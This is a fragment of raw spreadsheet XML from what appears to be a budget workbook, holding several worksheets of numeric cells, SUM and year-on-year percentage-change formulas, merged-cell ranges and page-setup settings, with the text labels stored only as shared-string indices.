        <f>C45+C46+C49</f>
        <v>417287</v>
      </c>
      <c r="D54" s="994">
        <f t="shared" si="0"/>
        <v>-10.3726534644959</v>
      </c>
      <c r="XEM54" s="1015"/>
      <c r="XEN54" s="1015"/>
      <c r="XEO54" s="1015"/>
      <c r="XEP54" s="1015"/>
      <c r="XEQ54" s="1015"/>
      <c r="XER54" s="1015"/>
      <c r="XES54" s="1015"/>
      <c r="XET54" s="1015"/>
      <c r="XEU54" s="1015"/>
      <c r="XEV54" s="1015"/>
      <c r="XEW54" s="1015"/>
      <c r="XEX54" s="1015"/>
      <c r="XEY54" s="1015"/>
      <c r="XEZ54" s="1015"/>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <dataValidations count="1">
    <dataValidation type="whole" operator="between" allowBlank="1" showInputMessage="1" showErrorMessage="1" sqref="B27 B38 B45 C6:C13 C26:C45 B15:C16 B18:C25">
      <formula1>-10000000000</formula1>
      <formula2>10000000000</formula2>
    </dataValidation>
  </dataValidations>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.708661417322835" right="0.708661417322835" top="0.511805555555556" bottom="0.314583333333333" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" scale="85" orientation="portrait"/>
  <headerFooter/>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599993896298105"/>
  </sheetPr>
  <dimension ref="A1:H22"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="F12" sqref="F12"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="7"/>
  <cols>
    <col min="1" max="1" width="12.4259259259259" style="184" customWidth="1"/>
    <col min="2" max="2" width="14.1481481481481" style="184" customWidth="1"/>
    <col min="3" max="4" width="17" style="184" customWidth="1"/>
    <col min="5" max="5" width="13.8425925925926" style="184" customWidth="1"/>
    <col min="6" max="6" width="16.1481481481481" style="184" customWidth="1"/>
    <col min="7" max="16384" width="10.2777777777778" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:8">
      <c r="A1" s="858" t="s">
        <v>784</v>
      </c>
      <c r="B1" s="995"/>
      <c r="C1" s="995"/>
      <c r="D1" s="995"/>
      <c r="E1" s="995"/>
      <c r="F1" s="995"/>
      <c r="G1" s="995"/>
      <c r="H1" s="995"/>
    </row>
    <row r="2" ht="17.4" spans="1:8">
      <c r="A2" s="996"/>
      <c r="B2" s="997"/>
      <c r="C2" s="997"/>
      <c r="D2" s="997"/>
      <c r="E2" s="997"/>
      <c r="F2" s="997"/>
      <c r="G2" s="997"/>
      <c r="H2" s="997"/>
    </row>
    <row r="3" ht="30" customHeight="1" spans="1:8">
      <c r="A3" s="998" t="s">
        <v>785</v>
      </c>
      <c r="B3" s="998"/>
      <c r="C3" s="998"/>
      <c r="D3" s="998"/>
      <c r="E3" s="998"/>
      <c r="F3" s="998"/>
      <c r="G3" s="999"/>
      <c r="H3" s="999"/>
    </row>
    <row r="4" ht="21" customHeight="1" spans="1:8">
      <c r="A4" s="1000" t="s">
        <v>373</v>
      </c>
      <c r="B4" s="1000"/>
      <c r="C4" s="1000"/>
      <c r="D4" s="1000"/>
      <c r="E4" s="1000"/>
      <c r="F4" s="1000"/>
      <c r="G4" s="1001"/>
      <c r="H4" s="1001"/>
    </row>
    <row r="5" ht="63.75" customHeight="1" spans="1:6">
      <c r="A5" s="1002" t="s">
        <v>703</v>
      </c>
      <c r="B5" s="1003" t="s">
        <v>704</v>
      </c>
      <c r="C5" s="1003" t="s">
        <v>786</v>
      </c>
      <c r="D5" s="1003" t="s">
        <v>787</v>
      </c>
      <c r="E5" s="1003" t="s">
        <v>788</v>
      </c>
      <c r="F5" s="1003" t="s">
        <v>789</v>
      </c>
    </row>
    <row r="6" ht="20.1" customHeight="1" spans="1:6">
      <c r="A6" s="1004" t="s">
        <v>790</v>
      </c>
      <c r="B6" s="1005">
        <f t="shared" ref="B6:F6" si="0">SUM(B7:B16)</f>
        <v>40</v>
      </c>
      <c r="C6" s="1006">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="D6" s="1005">
        <f t="shared" si="0"/>
        <v>40</v>
      </c>
      <c r="E6" s="1006">
        <v>0</v>
      </c>
      <c r="F6" s="1006">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
    </row>
    <row r="7" ht="20.1" customHeight="1" spans="1:6">
      <c r="A7" s="1007" t="s">
        <v>791</v>
      </c>
      <c r="B7" s="1008">
        <f t="shared" ref="B7:B9" si="1">SUM(C7:F7)</f>
        <v>0</v>
      </c>
      <c r="C7" s="164"/>
      <c r="D7" s="1009"/>
      <c r="E7" s="164"/>
      <c r="F7" s="164"/>
    </row>
    <row r="8" ht="20.1" customHeight="1" spans="1:6">
      <c r="A8" s="1007" t="s">
        <v>792</v>
      </c>
      <c r="B8" s="1008">
        <f t="shared" ref="B8:B16" si="2">SUM(C8:F8)</f>
        <v>0</v>
      </c>
      <c r="C8" s="164"/>
      <c r="D8" s="164"/>
      <c r="E8" s="164"/>
      <c r="F8" s="164"/>
    </row>
    <row r="9" ht="20.1" customHeight="1" spans="1:6">
      <c r="A9" s="1007" t="s">
        <v>793</v>
      </c>
      <c r="B9" s="1008">
        <f t="shared" si="2"/>
        <v>40</v>
      </c>
      <c r="C9" s="164"/>
      <c r="D9" s="164">
        <v>40</v>
      </c>
      <c r="E9" s="164"/>
      <c r="F9" s="164"/>
    </row>
    <row r="10" ht="20.1" customHeight="1" spans="1:6">
      <c r="A10" s="1007" t="s">
        <v>794</v>
      </c>
      <c r="B10" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C10" s="164"/>
      <c r="D10" s="164"/>
      <c r="E10" s="164"/>
      <c r="F10" s="164"/>
    </row>
    <row r="11" ht="20.1" customHeight="1" spans="1:6">
      <c r="A11" s="1007" t="s">
        <v>795</v>
      </c>
      <c r="B11" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C11" s="164"/>
      <c r="D11" s="164"/>
      <c r="E11" s="164"/>
      <c r="F11" s="164"/>
    </row>
    <row r="12" ht="20.1" customHeight="1" spans="1:6">
      <c r="A12" s="1007" t="s">
        <v>796</v>
      </c>
      <c r="B12" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C12" s="164"/>
      <c r="D12" s="164"/>
      <c r="E12" s="164"/>
      <c r="F12" s="164"/>
    </row>
    <row r="13" ht="20.1" customHeight="1" spans="1:6">
      <c r="A13" s="1007" t="s">
        <v>797</v>
      </c>
      <c r="B13" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C13" s="164"/>
      <c r="D13" s="164"/>
      <c r="E13" s="164"/>
      <c r="F13" s="164"/>
    </row>
    <row r="14" ht="20.1" customHeight="1" spans="1:6">
      <c r="A14" s="1007" t="s">
        <v>798</v>
      </c>
      <c r="B14" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C14" s="164"/>
      <c r="D14" s="164"/>
      <c r="E14" s="164"/>
      <c r="F14" s="164"/>
    </row>
    <row r="15" ht="20.1" customHeight="1" spans="1:6">
      <c r="A15" s="1007" t="s">
        <v>799</v>
      </c>
      <c r="B15" s="1008">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C15" s="164"/>
      <c r="D15" s="164"/>
      <c r="E15" s="164"/>
      <c r="F15" s="164"/>
    </row>
    <row r="16" ht="20.1" customHeight="1" spans="1:6">
      <c r="A16" s="1010" t="s">
        <v>800</v>
      </c>
      <c r="B16" s="1011">
        <f t="shared" si="2"/>
        <v>0</v>
      </c>
      <c r="C16" s="1012"/>
      <c r="D16" s="1012"/>
      <c r="E16" s="1012"/>
      <c r="F16" s="1013"/>
    </row>
    <row r="20" spans="4:4">
      <c r="D20" s="1014"/>
    </row>
    <row r="21" spans="4:4">
      <c r="D21" s="1014"/>
    </row>
    <row r="22" spans="4:4">
      <c r="D22" s="1014"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A3:F3"/>
    <mergeCell ref="A4:F4"/>
  </mergeCells>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.511811023622047" right="0.511811023622047" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D20"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B16" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="D18" sqref="D18"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="45.2777777777778" style="968" customWidth="1"/>
    <col min="2" max="4" width="13" style="968" customWidth="1"/>
    <col min="5" max="16375" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" spans="1:4">
      <c r="A1" s="858" t="s">
        <v>801</v>
      </c>
      <c r="D1" s="986"/>
    </row>
    <row r="2" ht="63" customHeight="1" spans="1:4">
      <c r="A2" s="969" t="s">
        <v>802</v>
      </c>
      <c r="B2" s="969"/>
      <c r="C2" s="969"/>
      <c r="D2" s="969"/>
    </row>
    <row r="3" spans="4:4">
      <c r="D3" s="970" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:4">
      <c r="A4" s="971" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="987" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="972"/>
    </row>
    <row r="5" ht="24" spans="1:4">
      <c r="A5" s="973"/>
      <c r="B5" s="988"/>
      <c r="C5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="D5" s="972" t="s">
        <v>380</v>
      </c>
    </row>
    <row r="6" ht="24" customHeight="1" spans="1:4">
      <c r="A6" s="974" t="s">
        <v>595</v>
      </c>
      <c r="B6" s="977">
        <v>60</v>
      </c>
      <c r="C6" s="977"/>
      <c r="D6" s="989">
        <f>IFERROR((C6-B6)/B6*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="7" ht="24" customHeight="1" spans="1:4">
      <c r="A7" s="974" t="s">
        <v>803</v>
      </c>
      <c r="B7" s="977">
        <v>60</v>
      </c>
      <c r="C7" s="977"/>
      <c r="D7" s="989">
        <f>IFERROR((C7-B7)/B7*100,"-")</f>
        <v>-100</v>
      </c>
    </row>
    <row r="8" ht="24" customHeight="1" spans="1:4">
      <c r="A8" s="974" t="s">
        <v>804</v>
      </c>
      <c r="B8" s="977">
        <f>B9+B10</f>
        <v>7706</v>
      </c>
      <c r="C8" s="977">
        <f>C9+C10</f>
        <v>1770</v>
      </c>
      <c r="D8" s="989">
        <f>IFERROR((C8-B8)/B8*100,"-")</f>
        <v>-77.0308850246561</v>
      </c>
    </row>
    <row r="9" ht="24" customHeight="1" spans="1:4">
      <c r="A9" s="974" t="s">
        <v>805</v>
      </c>
      <c r="B9" s="990">
        <v>7706</v>
      </c>
      <c r="C9" s="977">
        <v>1770</v>
      </c>
      <c r="D9" s="989">
        <f>IFERROR((C9-B9)/B9*100,"-")</f>
        <v>-77.0308850246561</v>
      </c>
    </row>
    <row r="10" ht="24" customHeight="1" spans="1:4">
      <c r="A10" s="974" t="s">
        <v>806</v>
      </c>
      <c r="B10" s="990"/>
      <c r="C10" s="991"/>
      <c r="D10" s="989"/>
    </row>
    <row r="11" ht="24" customHeight="1" spans="1:4">
      <c r="A11" s="974" t="s">
        <v>599</v>
      </c>
      <c r="B11" s="990"/>
      <c r="C11" s="977"/>
      <c r="D11" s="989"/>
    </row>
    <row r="12" ht="24" customHeight="1" spans="1:4">
      <c r="A12" s="974" t="s">
        <v>600</v>
      </c>
      <c r="B12" s="990"/>
      <c r="C12" s="977"/>
      <c r="D12" s="989"/>
    </row>
    <row r="13" ht="24" customHeight="1" spans="1:4">
      <c r="A13" s="974" t="s">
        <v>601</v>
      </c>
      <c r="B13" s="990"/>
      <c r="C13" s="977"/>
      <c r="D13" s="989"/>
    </row>
    <row r="14" ht="24" customHeight="1" spans="1:4">
      <c r="A14" s="974" t="s">
        <v>602</v>
      </c>
      <c r="B14" s="992"/>
      <c r="C14" s="977"/>
      <c r="D14" s="989"/>
    </row>
    <row r="15" ht="24" customHeight="1" spans="1:4">
      <c r="A15" s="974" t="s">
        <v>603</v>
      </c>
      <c r="B15" s="977"/>
      <c r="C15" s="977">
        <v>10000</v>
      </c>
      <c r="D15" s="989"/>
    </row>
    <row r="16" ht="24" customHeight="1" spans="1:4">
      <c r="A16" s="980" t="s">
        <v>405</v>
      </c>
      <c r="B16" s="981">
        <f>SUM(B6,B8,B12,B14,B15)</f>
        <v>7766</v>
      </c>
      <c r="C16" s="981">
        <f>SUM(C6,C8,C12,C14,C15)</f>
        <v>11770</v>
      </c>
      <c r="D16" s="993">
        <f>IFERROR((C16-B16)/B16*100,"-")</f>
        <v>51.5580736543909</v>
      </c>
    </row>
    <row r="17" ht="24" customHeight="1" spans="1:4">
      <c r="A17" s="974" t="s">
        <v>541</v>
      </c>
      <c r="B17" s="977">
        <f>SUM(B18:B19)</f>
        <v>39</v>
      </c>
      <c r="C17" s="977">
        <f>SUM(C18:C19)</f>
        <v>39</v>
      </c>
      <c r="D17" s="989">
        <f>IFERROR((C17-B17)/B17*100,"-")</f>
        <v>0</v>
      </c>
    </row>
    <row r="18" ht="24" customHeight="1" spans="1:4">
      <c r="A18" s="974" t="s">
        <v>604</v>
      </c>
      <c r="B18" s="977">
        <v>39</v>
      </c>
      <c r="C18" s="977">
        <v>39</v>
      </c>
      <c r="D18" s="989">
        <f>IFERROR((C18-B18)/B18*100,"-")</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="24" customHeight="1" spans="1:4">
      <c r="A19" s="974" t="s">
        <v>605</v>
      </c>
      <c r="B19" s="977"/>
      <c r="C19" s="977"/>
      <c r="D19" s="989"/>
    </row>
    <row r="20" ht="24" customHeight="1" spans="1:4">
      <c r="A20" s="780" t="s">
        <v>417</v>
      </c>
      <c r="B20" s="984">
        <f>SUM(B16,B17)</f>
        <v>7805</v>
      </c>
      <c r="C20" s="984">
        <f>SUM(C16,C17)</f>
        <v>11809</v>
      </c>
      <c r="D20" s="994">
        <f>IFERROR((C20-B20)/B20*100,"-")</f>
        <v>51.3004484304933</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <pageMargins left="0.629861111111111" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9" orientation="portrait"/>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6"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:D20"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="1" ySplit="6" topLeftCell="B7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="C8" sqref="C8:C9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10.2777777777778" defaultRowHeight="15.6" outlineLevelCol="3"/>
  <cols>
    <col min="1" max="1" width="38.1481481481481" style="968" customWidth="1"/>
    <col min="2" max="4" width="15" style="968" customWidth="1"/>
    <col min="5" max="16376" width="10.2777777777778" style="968"/>
  </cols>
  <sheetData>
    <row r="1" ht="17.4" spans="1:1">
      <c r="A1" s="858" t="s">
        <v>807</v>
      </c>
    </row>
    <row r="2" ht="60.95" customHeight="1" spans="1:4">
      <c r="A2" s="969" t="s">
        <v>808</v>
      </c>
      <c r="B2" s="969"/>
      <c r="C2" s="969"/>
      <c r="D2" s="969"/>
    </row>
    <row r="3" spans="4:4">
      <c r="D3" s="970" t="s">
        <v>373</v>
      </c>
    </row>
    <row r="4" ht="24.95" customHeight="1" spans="1:4">
      <c r="A4" s="971" t="s">
        <v>374</v>
      </c>
      <c r="B4" s="972" t="s">
        <v>517</v>
      </c>
      <c r="C4" s="972" t="s">
        <v>519</v>
      </c>
      <c r="D4" s="972"/>
    </row>
    <row r="5" ht="24" spans="1:4">
      <c r="A5" s="973"/>
      <c r="B5" s="972"/>
      <c r="C5" s="972" t="s">
        <v>378</v>
      </c>
      <c r="D5" s="972" t="s">
        <v>809</v>
      </c>
    </row>
    <row r="6" ht="30" customHeight="1" spans="1:4">
      <c r="A6" s="974" t="s">
        <v>608</v>
      </c>
      <c r="B6" s="975"/>
      <c r="C6" s="975"/>
      <c r="D6" s="976"/>
    </row>
    <row r="7" ht="30" customHeight="1" spans="1:4">
      <c r="A7" s="974" t="s">
        <v>609</v>
      </c>
      <c r="B7" s="977">
        <f>SUM(B8:B9)</f>
        <v>72</v>
      </c>
      <c r="C7" s="977">
        <f>SUM(C8:C9)</f>
        <v>64</v>
      </c>
      <c r="D7" s="978">
        <f>IFERROR((C7-B7)/B7*100,"-")</f>
        <v>-11.1111111111111</v>
      </c>
    </row>
    <row r="8" ht="30" customHeight="1" spans="1:4">
      <c r="A8" s="974" t="s">
        <v>610</v>
      </c>
      <c r="B8" s="977">
        <v>66</v>
      </c>
      <c r="C8" s="977">
        <v>58</v>
      </c>
      <c r="D8" s="978">
        <f>IFERROR((C8-B8)/B8*100,"-")</f>
        <v>-12.1212121212121</v>
      </c>
    </row>
    <row r="9" ht="30" customHeight="1" spans="1:4">
      <c r="A9" s="974" t="s">
        <v>611</v>
      </c>
      <c r="B9" s="977">
        <v>6</v>
      </c>
      <c r="C9" s="977">
        <v>6</v>
      </c>
      <c r="D9" s="978">
        <f>IFERROR((C9-B9)/B9*100,"-")</f>
        <v>0</v>
      </c>
    </row>
    <row r="10" ht="30" customHeight="1" spans="1:4">
      <c r="A10" s="979"/>
      <c r="B10" s="977"/>
      <c r="C10" s="977"/>
      <c r="D10" s="978"/>
    </row>
    <row r="11" ht="30" customHeight="1" spans="1:4">
      <c r="A11" s="979"/>
      <c r="B11" s="977"/>
      <c r="C11" s="977"/>
      <c r="D11" s="978"/>
    </row>
    <row r="12" ht="30" customHeight="1" spans="1:4">
      <c r="A12" s="979"/>
      <c r="B12" s="977"/>
      <c r="C12" s="977"/>
      <c r="D12" s="978"/>
    </row>
    <row r="13" ht="30" customHeight="1" spans="1:4">
      <c r="A13" s="979"/>
      <c r="B13" s="977"/>
      <c r="C13" s="977"/>
      <c r="D13" s="978"/>
    </row>
    <row r="14" ht="30" customHeight="1" spans="1:4">
      <c r="A14" s="979"/>
      <c r="B14" s="977"/>
      <c r="C14" s="977"/>
      <c r="D14" s="978"/>
    </row>
    <row r="15" ht="30" customHeight="1" spans="1:4">
      <c r="A15" s="980" t="s">
        <v>444</v>
      </c>
      <c r="B15" s="981">
        <f>SUM(B6,B7)</f>
        <v>72</v>
      </c>
      <c r="C15" s="981">
        <f>SUM(C6,C7)</f>
        <v>64</v>
      </c>
      <c r="D15" s="982">
        <f>IFERROR((C15-B15)/B15*100,"-")</f>
        <v>-11.1111111111111</v>
      </c>
    </row>
    <row r="16" ht="30" customHeight="1" spans="1:4">
      <c r="A16" s="974" t="s">
        <v>448</v>
      </c>
      <c r="B16" s="977">
        <f>SUM(B17:B19)</f>
        <v>7733</v>
      </c>
      <c r="C16" s="977">
        <f>SUM(C17:C19)</f>
        <v>11745</v>
      </c>
      <c r="D16" s="978">
        <f>IFERROR((C16-B16)/B16*100,"-")</f>
        <v>51.8815466183887</v>
      </c>
    </row>
    <row r="17" ht="30" customHeight="1" spans="1:4">
      <c r="A17" s="974" t="s">
        <v>591</v>
      </c>
      <c r="B17" s="731">
        <v>7719</v>
      </c>
      <c r="C17" s="977">
        <v>11731</v>
      </c>
      <c r="D17" s="978">
        <f>IFERROR((C17-B17)/B17*100,"-")</f>
        <v>51.975644513538</v>
      </c>
    </row>
    <row r="18" ht="30" customHeight="1" spans="1:4">
      <c r="A18" s="983" t="s">
        <v>780</v>
      </c>
      <c r="B18" s="731">
        <v>14</v>
      </c>
      <c r="C18" s="977">
        <v>14</v>
      </c>
      <c r="D18" s="978">
        <f>IFERROR((C18-B18)/B18*100,"-")</f>
        <v>0</v>
      </c>
    </row>
    <row r="19" ht="30" customHeight="1" spans="1:4">
      <c r="A19" s="974" t="s">
        <v>612</v>
      </c>
      <c r="B19" s="731"/>
      <c r="C19" s="977"/>
      <c r="D19" s="978"/>
    </row>
    <row r="20" ht="30" customHeight="1" spans="1:4">
      <c r="A20" s="780" t="s">
        <v>454</v>
      </c>
      <c r="B20" s="984">
        <f>SUM(B15,B16)</f>
        <v>7805</v>
      </c>
      <c r="C20" s="984">
        <f>SUM(C15,C16)</f>
        <v>11809</v>
      </c>
      <c r="D20" s="985">
        <f>IFERROR((C20-B20)/B20*100,"-")</f>
        <v>51.3004484304933</v>
      </c>
    </row>
  </sheetData>
  <mergeCells count="4">
    <mergeCell ref="A2:D2"/>
    <mergeCell ref="C4:D4"/>
    <mergeCell ref="A4:A5"/>
    <mergeCell ref="B4:B5"/>
  </mergeCells>
  <pageMargins left="0.590277777777778" right="0.708661417322835" top="0.748031496062992" bottom="0.748031496062992" header="0.31496062992126" footer="0.31496062992126"/>
  <pageSetup paperSize="9"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599993896298105"/>
    <pageSetUpPr fitToPage="1"/>
  </sheetPr>
  <dimension ref="A1:G62"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <pane xSplit="3" ySplit="6" topLeftCell="D7" activePane="bottomRight" state="frozen"/>
      <selection/>
      <selection pane="topRight"/>
      <selection pane="bottomLeft"/>
      <selection pane="bottomRight" activeCell="B9" sqref="B9"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15.6" outlineLevelCol="6"/>
  <cols>
    <col min="1" max="1" width="17.2777777777778" style="184" customWidth="1"/>
    <col min="2" max="2" width="18.7222222222222" style="184" customWidth="1"/>
    <col min="3" max="4" width="19" style="184" customWidth="1"/>
    <col min="5" max="5" width="14.7222222222222" style="184" customWidth="1"/>
    <col min="6" max="16384" width="10" style="184"/>
  </cols>
  <sheetData>
    <row r="1" ht="18" customHeight="1" spans="1:6">
      <c r="A1" s="858" t="s">
        <v>810</v>
      </c>
      <c r="B1" s="395"/>
      <c r="C1" s="395"/>
      <c r="D1" s="395"/>
      <c r="E1" s="396"/>
      <c r="F1" s="397"/>
    </row>
    <row r="2" ht="56.45" customHeight="1" spans="1:6">
      <c r="A2" s="901" t="s">
        <v>811</v>
      </c>
      <c r="B2" s="901"/>
      <c r="C2" s="942"/>
      <c r="D2" s="901"/>
      <c r="E2" s="901"/>
      <c r="F2" s="400"/>
    </row>
    <row r="3" ht="18.95" customHeight="1" spans="1:6">
      <c r="A3" s="401"/>
      <c r="B3" s="402"/>
      <c r="C3" s="402"/>
      <c r="D3" s="402"/>
      <c r="E3" s="402" t="s">
        <v>373</v>
      </c>
      <c r="F3" s="403"/>
    </row>
    <row r="4" ht="27" customHeight="1" spans="1:6">
      <c r="A4" s="404" t="s">
        <v>812</v>
      </c>
      <c r="B4" s="405" t="s">
        <v>813</v>
      </c>
      <c r="C4" s="406" t="s">
        <v>814</v>
      </c>
      <c r="D4" s="406"/>
      <c r="E4" s="406"/>
      <c r="F4" s="403"/>
    </row>
    <row r="5" ht="45" customHeight="1" spans="1:6">
      <c r="A5" s="498"/>
      <c r="B5" s="953"/>
      <c r="C5" s="954" t="s">
        <v>815</v>
      </c>
      <c r="D5" s="954" t="s">
        <v>816</v>
      </c>
      <c r="E5" s="954" t="s">
        <v>817</v>
      </c>
      <c r="F5" s="408"/>
    </row>
    <row r="6" ht="32.45" customHeight="1" spans="1:6">
      <c r="A6" s="955" t="s">
        <v>705</v>
      </c>
      <c r="B6" s="956">
        <f>C6+D6+E6</f>
        <v>1</v>
      </c>
      <c r="C6" s="957">
        <v>1</v>
      </c>
      <c r="D6" s="958"/>
      <c r="E6" s="959"/>
      <c r="F6" s="412"/>
    </row>
    <row r="7" ht="32.45" customHeight="1" spans="1:6">
      <c r="A7" s="960" t="s">
        <v>706</v>
      </c>
      <c r="B7" s="505">
        <f t="shared" ref="B7:B15" si="0">C7+D7+E7</f>
        <v>9</v>
      </c>
      <c r="C7" s="961">
        <v>9</v>
      </c>
      <c r="D7" s="962"/>
      <c r="E7" s="963"/>
      <c r="F7" s="412"/>
    </row>
    <row r="8" ht="32.45" customHeight="1" spans="1:6">
      <c r="A8" s="960" t="s">
        <v>707</v>
      </c>
      <c r="B8" s="505">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="C8" s="961">
        <v>1</v>
      </c>
      <c r="D8" s="962"/>
      <c r="E8" s="963"/>
      <c r="F8" s="412"/>
    </row>
    <row r="9" ht="32.45" customHeight="1" spans="1:6">
      <c r="A9" s="960" t="s">
        <v>708</v>
      </c>
      <c r="B9" s="505">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C9" s="961">
        <v>0</v>
      </c>
      <c r="D9" s="962"/>
      <c r="E9" s="963"/>
      <c r="F9" s="412"/>
    </row>
    <row r="10" ht="32.45" customHeight="1" spans="1:6">
      <c r="A10" s="960" t="s">
        <v>709</v>
      </c>
      <c r="B10" s="505">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C10" s="961">
        <v>0</v>
      </c>
      <c r="D10" s="962"/>
      <c r="E10" s="963"/>
      <c r="F10" s="412"/>
    </row>
    <row r="11" ht="32.45" customHeight="1" spans="1:6">
      <c r="A11" s="960" t="s">
        <v>710</v>
      </c>
      <c r="B11" s="505">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="C11" s="961">
        <v>1</v>
      </c>
      <c r="D11" s="962"/>
      <c r="E11" s="963"/>
      <c r="F11" s="412"/>
    </row>
    <row r="12" ht="32.45" customHeight="1" spans="1:6">
      <c r="A12" s="960" t="s">
        <v>711</v>
      </c>
      <c r="B12" s="505">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="C12" s="961">
        <v>1</v>
      </c>
      <c r="D12" s="962"/>
      <c r="E12" s="963"/>
      <c r="F12" s="412"/>
    </row>
    <row r="13" ht="32.45" customHeight="1" spans="1:6">
      <c r="A13" s="960" t="s">
        <v>712</v>
      </c>
      <c r="B13" s="505">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C13" s="961">
        <v>0</v>
      </c>
      <c r="D13" s="962"/>
      <c r="E13" s="963"/>
      <c r="F13" s="412"/>
    </row>
    <row r="14" ht="32.45" customHeight="1" spans="1:6">
      <c r="A14" s="960" t="s">
        <v>713</v>
      </c>
      <c r="B14" s="505">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="C14" s="961">
        <v>0</v>
      </c>
      <c r="D14" s="962"/>
      <c r="E14" s="963"/>
      <c r="F14" s="412"/>
    </row>
    <row r="15" ht="32.45" customHeight="1" spans="1:6">
      <c r="A15" s="960" t="s">
        <v>714</v>
      </c>
      <c r="B15" s="505">
        <f t="shared" si="0"/>
        <v>1</v>
      </c>
      <c r="C15" s="961">
        <v>1</v>
      </c>
      <c r="D15" s="962"/>
      <c r="E15" s="963"/>
      <c r="F15" s="412"/>
    </row>
    <row r="16" ht="32.45" customHeight="1" spans="1:7">
      <c r="A16" s="964" t="s">
        <v>813</v>
      </c>
      <c r="B16" s="965">
        <f>SUM(B6:B15)</f>
        <v>14</v>
      </c>
      <c r="C16" s="965">
        <f>SUM(C6:C15)</f>
        <v>14</v>
      </c>
      <c r="D16" s="966"/>
      <c r="E16" s="967"/>
      <c r="F16" s="412"/>
      <c r="G16" s="416"/>
    </row>
    <row r="17" ht="27.95" customHeight="1" spans="1:6">
      <c r="A17" s="316" t="s">
        <v>818</v>
      </c>
      <c r="B17" s="417"/>
      <c r="C17" s="417"/>
      <c r="D17" s="417"/>
      <c r="E17" s="417"/>
      <c r="F17" s="418"/>
    </row>
    <row r="18" ht="14.4" spans="1:6">
      <c r="A18" s="418"/>
      <c r="B18" s="417"/>
      <c r="C18" s="417"/>
      <c r="D18" s="417"/>
      <c r="E18" s="417"/>
      <c r="F18" s="418"/>
    </row>
    <row r="19" ht="14.4" spans="1:6">
      <c r="A19" s="418"/>
      <c r="B19" s="417"/>
      <c r="C19" s="417"/>
      <c r="D19" s="417"/>
      <c r="E19" s="417"/>
      <c r="F19" s="418"/>
    </row>
    <row r="20" ht="14.4" spans="1:6">
      <c r="A20" s="418"/>
      <c r="B20" s="417"/>
      <c r="C20" s="417"/>
      <c r="D20" s="417"/>
      <c r="E20" s="417"/>
      <c r="F20" s="418"/>
    </row>
    <row r="21" ht="14.4" spans="1:6">
      <c r="A21" s="418"/>
      <c r="B21" s="417"/>
      <c r="C21" s="417"/>
      <c r="D21" s="417"/>
      <c r="E21" s="417"/>
      <c r="F21" s="418"/>
    </row>
    <row r="22" ht="14.4" spans="1:6">
      <c r="A22" s="418"/>
      <c r="B22" s="417"/>
      <c r="C22" s="417"/>
      <c r="D22" s="417"/>
      <c r="E22" s="417"/>
      <c r="F22" s="418"/>
    </row>
    <row r="23" ht="14.4" spans="1:6">
      <c r="A23" s="418"/>
      <c r="B23" s="417"/>
      <c r="C23" s="417"/>
